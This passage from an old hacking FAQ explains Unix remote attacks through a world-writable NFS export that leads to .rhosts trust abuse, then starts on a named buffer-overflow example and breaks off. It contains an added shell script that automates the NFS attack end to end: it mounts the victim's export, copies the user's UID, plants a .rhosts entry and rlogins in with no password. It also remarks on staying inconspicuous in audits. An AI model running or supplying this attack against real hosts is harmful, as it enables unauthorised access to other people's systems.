30.0 Unix Remote Attacks

A remote hack is an attack on a server you are not logged into. Usually it is launched from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we won't really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually the goal is to exploit an existing service running on the victim server that is misconfigured or allows too much access. Exporting an NFS directory read/write to the world might not be a bad thing by itself, but if the directories you can mount contain .rhosts files (home directories, in other words), then it can be a very bad thing. Also, certain daemons may be subject to buffer overflows remotely, allowing someone at a remote location to run arbitrary commands on the victim server.

Here are a couple of examples:

You are root on a host named badguy.

You discover that the host victim is exporting /home2/old read/write to the world (showmount -e victim lists its exports).

You also discover, by fingering various accounts, that user fred's home directory is /home2/old/fred and that he hasn't logged in for months.

Quickly, you create a fred account on badguy, giving it the same numeric UID that fred has on victim. NFS trusts the UID the client sends, not the user name, and root is normally mapped to nobody on the server, so writing into fred's directory as root would not work.

Now you mount /home2/old on badguy and, as fred, create a .rhosts file in fred's home directory that trusts fred coming from badguy.

After you become fred on badguy, you rlogin to victim as fred and get in with no password.
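The steps above scripted as an added example; this is not code from the original FAQ. The host names badguy and victim, the user fred and the export /home2/old come from the text; the sample showmount output used to exercise world_exports is constructed, the useradd flags are Linux's, and attack() needs root on badguy plus a live victim, so it only runs when you pass the word run explicitly.

```shell
#!/bin/sh
# Added example (not from the original FAQ): scripts the NFS/.rhosts trust
# attack described above. badguy, victim, fred and /home2/old are from the
# text; the sample showmount output is constructed; attack() needs root and
# a real NFS server, so it is never launched unless the script is told to.

# Print the export paths a server hands to every client. Feed it the output
# of "showmount -e victim". The client column differs by platform ("*" on
# Linux, "(everyone)" on Solaris), so both are accepted. Whether an export
# is read/write is not shown here; you find out when you try to write.
world_exports() {
    awk 'NR > 1 && ($2 == "*" || $2 == "(everyone)") { print $1 }'
}

# Numeric UID that owns a path (ls -n is POSIX). Run on the mounted home
# directory it tells you which UID to give the local fred account.
owner_uid() {
    ls -ldn "$1" | awk '{ print $3 }'
}

# One .rhosts entry: "host user" lets USER on HOST log in with no password.
# "+ +" would trust everyone, but is far more conspicuous in an audit.
rhosts_line() {
    printf '%s %s\n' "$1" "$2"
}

# The whole attack, run as root on badguy:   attack victim /home2/old fred
attack() {
    victim=$1 export=$2 user=$3
    mnt=/mnt/victim
    mkdir -p "$mnt"
    mount "$victim:$export" "$mnt" || return 1

    # NFS (AUTH_UNIX) believes the numeric UID the client sends, not the
    # name, and root is normally squashed to nobody. So mirror fred's UID
    # locally and do the write as that user, not as root.
    uid=$(owner_uid "$mnt/$user")
    useradd -u "$uid" -M "$user" 2>/dev/null || true   # Linux useradd; adjust elsewhere

    # Most rlogind implementations ignore a .rhosts that is owned by someone
    # other than the user (or root) or is group/world writable: hence umask 077.
    su "$user" -c "umask 077; echo '$(rhosts_line badguy "$user")' > '$mnt/$user/.rhosts'"

    umount "$mnt"
    su "$user" -c "rlogin -l $user $victim"
}

# Only launch when asked:   sh attack.sh run victim /home2/old fred
if [ "${1:-}" = run ]; then
    attack "$2" "$3" "$4"
fi
```

The parsing and file-building helpers are separate from attack() so they can be checked offline; only the mount, useradd, su and rlogin steps touch the network and need privileges.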

Here's another attack, this one involving a buffer overflow:

The remote system is running named.

You have written a named exploit that lets you send arbitrary commands through the named daemon. It does a buffer overflow trick; you compile it and name it sploit.